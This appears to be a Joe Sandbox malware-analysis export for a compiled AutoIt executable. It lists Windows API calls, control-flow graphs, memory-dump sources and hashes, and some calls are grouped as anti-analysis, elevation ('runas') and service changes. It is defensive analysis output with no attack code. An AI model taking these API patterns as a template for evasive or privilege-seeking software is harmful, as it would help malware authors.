109573->109464 109574->109467 109575->109472 109576->109464 109580 42520a GetSystemTimeAsFileTime 109577->109580 109579 468f6e 109579->109312 109581 425238 __aulldiv 109580->109581 109581->109579 109583 425c6c __setmode 109582->109583 109584 425c93 109583->109584 109585 425c7e 
109583->109585 109586 426c11 __lock_file 59 API calls 109584->109586 109596 428b28 58 API calls __getptd_noexit 109585->109596 109588 425c99 109586->109588 109598 4258d0 67 API calls 6 library calls 109588->109598 109589 425c83 109597 428db6 9 API calls __setmode 109589->109597 109592 425ca4 109599 425cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 109592->109599 109593 425c8e __setmode 109593->109317 109595 425cb6 109595->109593 109596->109589 109597->109593 109598->109592 109599->109595 109601 4078b7 109600->109601 109602 40785a 109600->109602 109603 407d2c 59 API calls 109601->109603 109602->109601 109604 407865 109602->109604 109610 407888 _memmove 109603->109610 109605 407880 109604->109605 109606 43eb09 109604->109606 109622 407f27 109605->109622 109626 408029 109606->109626 109609 43eb13 109611 420db6 Mailbox 59 API calls 109609->109611 109610->109100 109612 43eb33 109611->109612 109614 407d43 _memmove 109613->109614 109615 407d3a 109613->109615 109614->109092 109615->109614 109616 407e4f 59 API calls 109615->109616 109616->109614 109618 407da6 109617->109618 109619 407d99 109617->109619 109620 420db6 Mailbox 59 API calls 109618->109620 109619->109093 109620->109619 109621->109121 109623 407f3f 109622->109623 109625 407f39 109622->109625 109624 420db6 Mailbox 59 API calls 109623->109624 109624->109625 109625->109610 109627 420db6 Mailbox 59 API calls 109626->109627 109628 408033 109627->109628 109628->109609 109630 407a85 _memmove 109629->109630 109631 407a5f 109629->109631 109630->109134 109631->109630 109632 420db6 Mailbox 59 API calls 109631->109632 109633 407ad4 109632->109633 109634 420db6 Mailbox 59 API calls 109633->109634 109634->109630 109635->109135 110004->109248 110006 407c5f __wsetenvp 110005->110006 110007 408029 59 API calls 110006->110007 110008 407c70 _memmove 110006->110008 110009 43ed07 _memmove 110007->110009 110008->109256 110011 463c3e 110010->110011 110012 464475 FindFirstFileW 110010->110012 110011->108766 110012->110011 
110013 46448a FindClose 110012->110013 110013->110011 110040 407a16 110014->110040 110016 40646a 110047 40750f 110016->110047 110018 406484 Mailbox 110018->109003 110021 43dff6 110057 45f8aa 91 API calls 4 library calls 110021->110057 110022 40750f 59 API calls 110035 406265 110022->110035 110026 407d8c 59 API calls 110026->110035 110027 43e004 110028 40750f 59 API calls 110027->110028 110029 43e01a 110028->110029 110029->110018 110030 406799 _memmove 110058 45f8aa 91 API calls 4 library calls 110030->110058 110031 43df92 110032 408029 59 API calls 110031->110032 110034 43df9d 110032->110034 110038 420db6 Mailbox 59 API calls 110034->110038 110035->110016 110035->110021 110035->110022 110035->110026 110035->110030 110035->110031 110036 407e4f 59 API calls 110035->110036 110045 405f6c 60 API calls 110035->110045 110046 405d41 59 API calls Mailbox 110035->110046 110055 405e72 60 API calls 110035->110055 110056 407924 59 API calls 2 library calls 110035->110056 110037 40643b CharUpperBuffW 110036->110037 110037->110035 110038->110030 110039->109007 110041 420db6 Mailbox 59 API calls 110040->110041 110042 407a3b 110041->110042 110043 408029 59 API calls 110042->110043 110044 407a4a 110043->110044 110044->110035 110045->110035 110046->110035 110048 4075af 110047->110048 110053 407522 _memmove 110047->110053 110050 420db6 Mailbox 59 API calls 110048->110050 110049 420db6 Mailbox 59 API calls 110051 407529 110049->110051 110050->110053 110052 420db6 Mailbox 59 API calls 110051->110052 110054 407552 110051->110054 110052->110054 110053->110049 110054->110018 110055->110035 110056->110035 110057->110027 110058->110018 110059->109043 110060->109015 110061->109029 110062->109027 110063->109031 110064->109041 110065->109044 110066->109048 110067->108787 110068->108785 110069->108676 110070->108676 110071->108669 110072->108675 110073->108662 110074->108675 110075->108698 110076->108704 110077 a77b23 110078 a77b2b 110077->110078 110079 a75f10 110077->110079 110080 a76084 
SetFilePointerEx 110079->110080 110081 a75d90 110079->110081 110080->110079 110082 401066 110087 40f76f 110082->110087 110084 40106c 110085 422d40 __cinit 67 API calls 110084->110085 110086 401076 110085->110086 110088 40f790 110087->110088 110120 41ff03 110088->110120 110092 40f7d7 110093 407667 59 API calls 110092->110093 110094 40f7e1 110093->110094 110095 407667 59 API calls 110094->110095 110096 40f7eb 110095->110096 110097 407667 59 API calls 110096->110097 110098 40f7f5 110097->110098 110099 407667 59 API calls 110098->110099 110100 40f833 110099->110100 110101 407667 59 API calls 110100->110101 110102 40f8fe 110101->110102 110130 415f87 110102->110130 110106 40f930 110107 407667 59 API calls 110106->110107 110108 40f93a 110107->110108 110158 41fd9e 110108->110158 110110 40f981 110111 40f991 GetStdHandle 110110->110111 110112 40f9dd 110111->110112 110113 4445ab 110111->110113 110114 40f9e5 OleInitialize 110112->110114 110113->110112 110115 4445b4 110113->110115 110114->110084 110165 466b38 64 API calls Mailbox 110115->110165 110117 4445bb 110166 467207 CreateThread 110117->110166 110119 4445c7 CloseHandle 110119->110114 110167 41ffdc 110120->110167 110123 41ffdc 59 API calls 110124 41ff45 110123->110124 110125 407667 59 API calls 110124->110125 110126 41ff51 110125->110126 110127 407bcc 59 API calls 110126->110127 110128 40f796 110127->110128 110129 420162 6 API calls 110128->110129 110129->110092 110131 407667 59 API calls 110130->110131 110132 415f97 110131->110132 110133 407667 59 API calls 110132->110133 110134 415f9f 110133->110134 110174 415a9d 110134->110174 110137 415a9d 59 API calls 110138 415faf 110137->110138 110139 407667 59 API calls 110138->110139 110140 415fba 110139->110140 110141 420db6 Mailbox 59 API calls 110140->110141 110142 40f908 110141->110142 110143 4160f9 110142->110143 110144 416107 110143->110144 110145 407667 59 API calls 110144->110145 110146 416112 110145->110146 110147 407667 59 API calls 110146->110147 110148 41611d 
Execution Graph

[Call-graph residue: the interactive execution graph was exported as raw node IDs, code addresses and edge pairs; that node/edge data is omitted here. The only recoverable information is the set of Windows API and CRT calls named on the graph nodes, listed below.]

Service control: OpenServiceW, ChangeServiceConfigW, StartServiceW, CloseServiceHandle, LocalFree
File I/O: CreateFileW, GetFileSizeEx, GetFileTime, SetFilePointerEx, WriteFile, CloseHandle, GetOpenFileNameW, GetFullPathNameW, GetLongPathNameW, GetCurrentDirectoryW, SetCurrentDirectoryW
Memory and process: VirtualAlloc, VirtualFree, VirtualProtect, HeapAlloc, GetProcessHeap, CreateThread, RtlExitUserThread, GetCurrentProcess, TerminateProcess, GetCurrentThreadId, GetPEB, Sleep
Loader and environment: LoadLibraryA, GetProcAddress, FreeLibrary, GetModuleFileNameW, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStartupInfoW, GetStdHandle, GetFileType
System and anti-analysis: IsDebuggerPresent, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, GetVersionExW, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Registry: RegOpenKeyExW, RegQueryValueExW, RegCloseKey
Window and UI: RegisterWindowMessageW, DefWindowProcW, PostQuitMessage, SetTimer, KillTimer, CreatePopupMenu, Shell_NotifyIconW, MoveWindow, SetFocus, DeleteObject, DestroyWindow, DestroyIcon, LoadStringW, MessageBoxA, IsThemeActive, SystemParametersInfoW
String and CRT: StrStrIW, lstrcmpiW, CharUpperBuffW, CharLowerBuffW, GetStringTypeW, EncodePointer, DecodePointer, TlsAlloc, TlsSetValue, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, _wcslen, _wcsstr, _wcscpy, _wcscat, _wcscmp, _memset, _memmove, _strcat
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID:
• String ID: d$w
• API String ID: 0-2400632791
• Opcode ID: 9bccdce21a806821f3e2059ebdda32f6cbc0128d7b988e095f68c1ad0ccd8c07
• Instruction ID: c0e82edb61b24c5a5ef0a2c537decbb7b60fab0d060e4391492348d88af8c680
• Opcode Fuzzy Hash: 9bccdce21a806821f3e2059ebdda32f6cbc0128d7b988e095f68c1ad0ccd8c07
• Instruction Fuzzy Hash: C9C18634B5CB80AFDF3597689D09B763AF46BA1B70F9D0646F5468A0F3E7109C04D622

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
• IsDebuggerPresent.KERNEL32 ref: 00403B7A
• GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
  • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
• SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
• SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
• ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
  • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
  • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
  • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
  • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
  • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
  • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
  • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
  • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
  • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
  • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
  • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
  • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
  • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
• String ID: This is a third-party compiled AutoIt script.$runas$%I
• API String ID: 529118366-2806069697
• Opcode ID: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
• Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
• Opcode Fuzzy Hash: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
• Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D

Control-flow Graph

[IDA control-flow graph for the function starting at 0x4049a0 (GetVersionExW, GetCurrentProcess/IsWow64Process, GetNativeSystemInfo/GetSystemInfo, FreeLibrary); node/edge dump omitted, calls listed under APIs below]
APIs
• GetVersionExW.KERNEL32(?), ref: 004049CD
  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
• GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
• IsWow64Process.KERNEL32(00000000), ref: 00404AA1
• GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
• FreeLibrary.KERNEL32(00000000), ref: 00404AF2
• GetSystemInfo.KERNEL32(00000000), ref: 00404B23
• GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
• String ID:
• API String ID: 1986165174-0
• Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
• Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
• Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
• Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E

Control-flow Graph

[IDA control-flow graph for the function starting at 0x404e89 (CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource); node/edge dump omitted, calls listed under APIs below]
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
• LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
• SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
• LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
• Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
• Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
• Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
• Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                                  • String ID: pbL$%I
                                                                                                                                                  • API String ID: 3964851224-1578263234
                                                                                                                                                  • Opcode ID: f44e8e321818ef44d85c2bb27a672c3eaf89e9879f2da58d0c5687bc8dfc2d35
                                                                                                                                                  • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                                                                                                                                                  • Opcode Fuzzy Hash: f44e8e321818ef44d85c2bb27a672c3eaf89e9879f2da58d0c5687bc8dfc2d35
                                                                                                                                                  • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                                                                                                                                                  • API String ID: 0-2838938394
                                                                                                                                                  • Opcode ID: 2c35b3d26c95a021f08b930a365da4d97caa2da8ff1c5750d170567e5b24b5e9
                                                                                                                                                  • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
                                                                                                                                                  • Opcode Fuzzy Hash: 2c35b3d26c95a021f08b930a365da4d97caa2da8ff1c5750d170567e5b24b5e9
                                                                                                                                                  • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0046448B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 48322524-0
                                                                                                                                                  • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                                                                                                  • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                                                                                                                                                  • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                                                                                                  • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                                                                                                                                                  APIs
                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                                                                                                                                                  • timeGetTime.WINMM ref: 00410D16
                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00410E61
                                                                                                                                                  • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                                                                                                                                                  • DestroyWindow.USER32 ref: 00410F06
                                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                                                                                                                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00445C60
                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00445C6E
                                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
                                                                                                                                                  • API String ID: 4212290369-1082885916
                                                                                                                                                  • Opcode ID: e78c3e333774d1b2a91a7bd1afa08df1fd288dd7c662dbc61be51d9d50ac89e9
                                                                                                                                                  • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                                                                                                                                                  • Opcode Fuzzy Hash: e78c3e333774d1b2a91a7bd1afa08df1fd288dd7c662dbc61be51d9d50ac89e9
                                                                                                                                                  • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFreeLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1762890227-0
                                                                                                                                                  • Opcode ID: fe6163557088461ac8e57a8976fe6ee8073fd03379c903709ad49e60b96d8816
                                                                                                                                                  • Instruction ID: cfecfdeb2dbcead49c9ce7fb68205a97d9f78326815ef50b8a4bb06b99cdcf4a
                                                                                                                                                  • Opcode Fuzzy Hash: fe6163557088461ac8e57a8976fe6ee8073fd03379c903709ad49e60b96d8816
                                                                                                                                                  • Instruction Fuzzy Hash: 71F1E731B1D340AECE3657684C09B7A3AE06F73B60F5C478AE5559A0F2DE6D8C09D236

Control-flow Graph (legend: Executed / Not Executed; graph image not reproduced, edge list follows)

control_flow_graph 1130 469155-469205 call 431940 call 420db6 call 40522e call 468f5f call 404ee5 call 42354c 1143 46920b-469212 call 469734 1130->1143 1144 4692b8-4692bf call 469734 1130->1144 1149 4692c1-4692c3 1143->1149 1150 469218-4692b6 call 4240fb call 422dbc call 422d8d call 4240fb call 422d8d * 2 1143->1150 1144->1149 1151 4692c8 1144->1151 1152 46952a-46952b 1149->1152 1154 4692cb-469387 call 404f0b * 8 call 4698e3 call 42525b 1150->1154 1151->1154 1157 469548-469558 call 405211 1152->1157 1189 469390-4693ab call 468fa5 1154->1189 1190 469389-46938b 1154->1190 1193 4693b1-4693b9 1189->1193 1194 46943d-469449 call 4253a6 1189->1194 1190->1152 1195 4693c1 1193->1195 1196 4693bb-4693bf 1193->1196 1201 46945f-469463 1194->1201 1202 46944b-46945a DeleteFileW 1194->1202 1198 4693c6-4693e4 call 404f0b 1195->1198 1196->1198 1206 4693e6-4693eb 1198->1206 1207 46940e-469424 call 468953 call 424863 1198->1207 1204 469505-469519 CopyFileW 1201->1204 1205 469469-4694f2 call 4240bb call 4699ea call 468b06 1201->1205 1202->1152 1209 46952d-469543 DeleteFileW call 4698a2 1204->1209 1210 46951b-469528 DeleteFileW 1204->1210 1205->1209 1226 4694f4-469503 DeleteFileW 1205->1226 1211 4693ee-469401 call 4690dd 1206->1211 1223 469429-469434 1207->1223 1209->1157 1210->1152 1221 469403-46940c 1211->1221 1221->1207 1223->1193 1225 46943a 1223->1225 1225->1194 1226->1152
APIs
  • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
  • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
• __wsplitpath.LIBCMT ref: 00469234
  • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
• _wcscpy.LIBCMT ref: 00469247
• _wcscat.LIBCMT ref: 0046925A
• __wsplitpath.LIBCMT ref: 0046927F
• _wcscat.LIBCMT ref: 00469295
• _wcscat.LIBCMT ref: 004692A8
  • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
  • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
• _wcscmp.LIBCMT ref: 004691EF
  • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
  • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
• _wcsncpy.LIBCMT ref: 004694C5
• DeleteFileW.KERNEL32(?,?), ref: 004694FB
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
